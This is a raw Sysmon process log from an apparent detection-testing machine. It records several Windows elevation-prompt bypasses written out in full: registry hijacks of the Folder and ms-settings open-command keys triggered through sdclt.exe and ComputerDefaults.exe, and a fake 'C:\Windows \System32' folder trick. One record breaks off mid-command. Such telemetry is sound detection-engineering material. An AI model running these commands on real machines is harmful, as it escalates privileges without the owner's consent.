01:04:09.650{51A89197-C789-6552-E402-000000001E00}6832C:\Windows\SysWOW64\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=131793BFA295C9AF787DB15CDFFCB8AEE659F01C,MD5=70E2034A1C3D0ECCB73F57E33D4BFFA0,SHA256=92CB5C8AB93952A7A5755276CDAB2F052AC9AE32964EAC2371CC056AC7B34E9B,IMPHASH=FB1328DBA53A95E7775F51164B2E5AEB{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000667197Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:09.586{51A89197-C789-6552-E302-000000001E00}1292C:\Windows\System32\control.exe10.0.17134.1 (WinBuild.160101.0800)Windows Control PanelMicrosoft® Windows® Operating SystemMicrosoft CorporationCONTROL.EXE"C:\Windows\System32\control.exe" /name 
Microsoft.BackupAndRestoreCenterC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=813D8A7B64F4C2290AA102137192E099DDF17404,MD5=625DAC87CB5D7D44C5CA1DA57898065F,SHA256=E91DA8CBA88D81737B982B29E2EAEB5FFA614E7256D8FB308633290702DD7D86,IMPHASH=7A8EC2645C24D85DE8216D63022623C0{51A89197-C789-6552-E202-000000001E00}344C:\Windows\System32\sdclt.exe"C:\Windows\system32\sdclt.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000667018Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:09.408{51A89197-C789-6552-E202-000000001E00}344C:\Windows\System32\sdclt.exe10.0.17134.1 (WinBuild.160101.0800)Microsoft® Windows BackupMicrosoft® Windows® Operating SystemMicrosoft Corporationsdclt.exe"C:\Windows\system32\sdclt.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=81075ADC86FCD253E84E5E9745881DA503512F0E,MD5=0632A8402C6504CD541AC93676AAD0F5,SHA256=5C5F48B079FBCAA5DFB3ED0CD3352154AC4869DA98FDCC44601C076F47503A84,IMPHASH=651E4CF2B45257EE0CBBFBAFB8BF4454{51A89197-C788-6552-DE02-000000001E00}7180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Value 'cmd.exe /c notepad.exe' New-ItemProperty -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Name \""DelegateExecute\"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666730Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:09.250{51A89197-C789-6552-E102-000000001E00}2888C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 300 0000025DF3FBDD20C:\Windows\system32\NT 
AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000666722Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:09.214{51A89197-C789-6552-E002-000000001E00}6960C:\Windows\System32\sdclt.exe10.0.17134.1 (WinBuild.160101.0800)Microsoft® Windows BackupMicrosoft® Windows® Operating SystemMicrosoft Corporationsdclt.exe"C:\Windows\system32\sdclt.exe" C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=81075ADC86FCD253E84E5E9745881DA503512F0E,MD5=0632A8402C6504CD541AC93676AAD0F5,SHA256=5C5F48B079FBCAA5DFB3ED0CD3352154AC4869DA98FDCC44601C076F47503A84,IMPHASH=651E4CF2B45257EE0CBBFBAFB8BF4454{51A89197-C788-6552-DE02-000000001E00}7180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Value 'cmd.exe /c notepad.exe' New-ItemProperty -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Name \""DelegateExecute\"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666577Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:08.105{51A89197-C788-6552-DF02-000000001E00}4972C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 
-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C788-6552-DE02-000000001E00}7180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Value 'cmd.exe /c notepad.exe' New-ItemProperty -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Name \""DelegateExecute\"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666571Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:08.095{51A89197-C788-6552-DE02-000000001E00}7180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {New-Item -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Value 'cmd.exe /c notepad.exe' New-ItemProperty -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Name \""DelegateExecute\"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666522Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 
01:04:07.841{51A89197-C787-6552-DD02-000000001E00}5648C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C787-6552-DC02-000000001E00}7568C:\Windows\System32\cmd.exe"cmd.exe" /c mkdir "\\?\C:\Windows \System32\" & copy "C:\Windows\System32\cmd.exe" "\\?\C:\Windows \System32\mmc.exe" & mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666515Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:07.831{51A89197-C787-6552-DC02-000000001E00}7568C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c mkdir "\\?\C:\Windows \System32\" & copy "C:\Windows\System32\cmd.exe" "\\?\C:\Windows \System32\mmc.exe" & mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666408Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:07.291{51A89197-C787-6552-DB02-000000001E00}6412C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console 
Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C787-6552-DA02-000000001E00}7980C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666389Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:07.271{51A89197-C787-6552-DA02-000000001E00}7980C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C787-6552-D902-000000001E00}5824C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666320Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:07.152{51A89197-C787-6552-D902-000000001E00}5824C:\Windows\System32\ComputerDefaults.exe10.0.17134.1 (WinBuild.160101.0800)Set Program Access and Computer Defaults Control PanelMicrosoft® Windows® Operating SystemMicrosoft CorporationComputerDefaults.EXE"C:\Windows\System32\ComputerDefaults.exe" 
C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=6ACA6C418777015ECD87287C1228084720B26AA4,MD5=1D494543B5C91E0EDD4C7C6C63EE25F0,SHA256=F2B961FC015180D8B4602EB4F4D22A6673AB6C3ED654C59E03F0AFBA1B68A2F5,IMPHASH=E4233225763223D3EDD7DFC3552572B3{51A89197-C785-6552-D402-000000001E00}3992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\ComputerDefaults.exe\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666057Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:06.991{51A89197-C786-6552-D802-000000001E00}4820C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 366 0000025DF26E2400C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000666024Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:06.950{51A89197-C786-6552-D702-000000001E00}5368C:\Windows\System32\ComputerDefaults.exe10.0.17134.1 (WinBuild.160101.0800)Set Program Access and Computer Defaults Control PanelMicrosoft® Windows® Operating SystemMicrosoft 
CorporationComputerDefaults.EXE"C:\Windows\System32\ComputerDefaults.exe" C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=6ACA6C418777015ECD87287C1228084720B26AA4,MD5=1D494543B5C91E0EDD4C7C6C63EE25F0,SHA256=F2B961FC015180D8B4602EB4F4D22A6673AB6C3ED654C59E03F0AFBA1B68A2F5,IMPHASH=E4233225763223D3EDD7DFC3552572B3{51A89197-C785-6552-D402-000000001E00}3992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\ComputerDefaults.exe\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000665655Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.580{51A89197-C785-6552-D502-000000001E00}7844C:\Windows\System32\notepad.exe10.0.17134.1 (WinBuild.160101.0800)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXEnotepad.exeC:\DetectionTesting\Temp\ExternalPayloads\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=867B54F1BC5B71045A9A00BACA485A24176B202C,MD5=BB9A06B8F2DD9D24C77F389D7B2B58D2,SHA256=899346F9F283A4FD5AA03015A3F58CDE5B9C0B6A5C4D64C2CC74E9B22C1348D7,IMPHASH=A8F8224EB74E94301B59B88492740A75{51A89197-C785-6552-D202-000000001E00}620C:\Windows\System32\cmd.execmd /c notepad.exeNT AUTHORITY\SYSTEM 154100x8000000000000000665654Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.581{51A89197-C785-6552-D602-000000001E00}7220C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 
-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C785-6552-D402-000000001E00}3992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\ComputerDefaults.exe\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000665647Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.568{51A89197-C785-6552-D402-000000001E00}3992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process 
Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=B0CFFB96BE88857EA65D2A493D82AB1456DB706C,MD5=80DE10195A11A3E7146EA7C38A67F0E6,SHA256=2BA1305C786991DD2261DDEDA61D74057383D84327CE540B080D8842B21B35A8,IMPHASH=5CD891320C666621E9783444DB8CBA78{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661423Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:18.485{51A89197-C756-6552-A102-000000001E00}5764C:\Windows\System32\HOSTNAME.EXE10.0.17134.1 (WinBuild.160101.0800)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=B0CFFB96BE88857EA65D2A493D82AB1456DB706C,MD5=80DE10195A11A3E7146EA7C38A67F0E6,SHA256=2BA1305C786991DD2261DDEDA61D74057383D84327CE540B080D8842B21B35A8,IMPHASH=5CD891320C666621E9783444DB8CBA78{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661238Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:18.260{51A89197-C756-6552-A002-000000001E00}6876C:\Windows\System32\HOSTNAME.EXE10.0.17134.1 (WinBuild.160101.0800)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft 
Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=B0CFFB96BE88857EA65D2A493D82AB1456DB706C,MD5=80DE10195A11A3E7146EA7C38A67F0E6,SHA256=2BA1305C786991DD2261DDEDA61D74057383D84327CE540B080D8842B21B35A8,IMPHASH=5CD891320C666621E9783444DB8CBA78{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661175Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:18.134{51A89197-C756-6552-9F02-000000001E00}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\VICTIM\AppData\Local\Temp\RES388A.tmp" "c:\Users\VICTIM\AppData\Local\Temp\CSC4481BFDED654486905D3FA98B5FDD6.TMP"C:\Users\VICTIM\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=76C1219AF982CDFD4C2ED915EB4AE0EE99895C01,MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{51A89197-C755-6552-9E02-000000001E00}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\lpfzcwjl.cmdline"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661059Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:17.842{51A89197-C755-6552-9E02-000000001E00}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.3056.0 built by: NET472REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft 
Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\lpfzcwjl.cmdline"C:\Users\VICTIM\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=311F2313016303A7B0296FCFA1E821905FF84304,MD5=B46100977911A0C9FB1C3E5F16A5017D,SHA256=DB58611DD100D2280FAD9BB38982FC287A46C42DD8C2F5C964C5796AB9371FE6,IMPHASH=9C5140449778B9B7CEF1476457A218C0{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000659828Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:08.011{51A89197-C74C-6552-9D02-000000001E00}4580C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000659631Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:07.653{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
C:\Users\VICTIM\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-BEB9-6552-C600-000000001E00}836C:\Windows\explorer.exe"C:\Windows\explorer.exe" /LOADSAVEDWINDOWSATTACKBOX-WIN10\VICTIM 154100x8000000000000000659168Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:07.152{51A89197-C74B-6552-9B02-000000001E00}7940C:\Windows\System32\smartscreen.exe10.0.17134.677 (WinBuild.160101.0800)Windows Defender SmartScreenMicrosoft® Windows® Operating SystemMicrosoft Corporationsmartscreen.exeC:\Windows\System32\smartscreen.exe -EmbeddingC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=CD69BD3F22820ADBA4AE0B65350ED57E487CB8EA,MD5=9A16C9E1817832AC2326DF8910C3E1CC,SHA256=FE217F1B4DA18CA0B1E469C7DB6C220D00FBA9E00425F2BA25C6C5B896401BF3,IMPHASH=ED414D5B8D82565C43463FE2BEB340A4{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000659073Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:06.900{51A89197-C74A-6552-9A02-000000001E00}7188C:\Windows\System32\rundll32.exe10.0.17134.1 (WinBuild.160101.0800)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} 
-EmbeddingC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=2F34CCFDD8141AEEE2E89FFB070CE239C7D00706,MD5=73C519F050C20580F8A62C849D49215A,SHA256=38847DC4C82C0775E7DAFCBC7FEA50749CDAC7B50AB8602E8FDFAD4401954C87,IMPHASH=F27A7FC3A53E74F45BE370131953896A{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000657896Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:49.770{51A89197-C6FD-6552-9302-000000001E00}5024C:\Windows\System32\backgroundTaskHost.exe10.0.17134.1 (WinBuild.160101.0800)Background Task HostMicrosoft® Windows® Operating SystemMicrosoft CorporationbackgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mcaC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961AppContainerSHA1=EA114FDE884B16817A7D348660EA6FA1C217D315,MD5=B7FC4A29431D4F795BBAB1FB182B759A,SHA256=48B9EB1E31B0C2418742CE07675D58C974DD9F03007988C90C1E38F217F5C65B,IMPHASH=D2ACF1CBC4A6DB14A34C687B9362D66B{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000657845Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:49.703{51A89197-C6FD-6552-9202-000000001E00}5348C:\Windows\System32\taskhostw.exe10.0.17134.619 (WinBuild.160101.0800)Host Process for Windows TasksMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskhostw.exetaskhostw.exe 
